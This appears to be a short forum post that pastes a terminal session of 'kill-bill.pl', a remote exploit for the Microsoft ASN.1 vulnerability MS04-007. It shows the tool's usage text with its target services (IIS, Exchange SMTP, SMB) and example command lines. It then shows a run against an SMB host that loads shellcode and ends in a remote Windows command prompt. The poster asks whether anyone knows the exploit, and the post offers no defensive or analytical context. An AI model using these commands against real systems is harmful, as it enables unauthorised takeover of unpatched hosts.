$ ./kill-bill.pl
. kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
by Solar Eclipse <solareclipse@phreedom.org>

Usage: kill-bill -p <port> -s <service> host

Services:
iis IIS HTTP server (port 80)
iis-ssl IIS HTTP server with SSL (port 443)
exchange Microsoft Exchange SMTP server (port 25)
smb-nbt SMB over NetBIOS (port 139)
smb SMB (port 445)

If a service is running on its default port you don't have to
specify both the service and the port.

Examples: kill-bill -s iis 192.168.0.1
kill-bill -p 80 192.168.0.1
kill-bill -p 1234 -s smb 192.168.0.1

$ ./kill-bill.pl -s smb 192.168.0.1
. kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
by Solar Eclipse <solareclipse@phreedom.org>

. Loading shellcode
. Generating SPNEGO token
SPNEGO token is 4222 bytes long.
. Exploiting SMB server at 192.168.0.1:445
Sending Negotiate Protocol Request
Sending Session Setup AndX request (4287) bytes
. Attempting to connect to shell on port 8721

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


this comes with some exploit instructions. any one know it?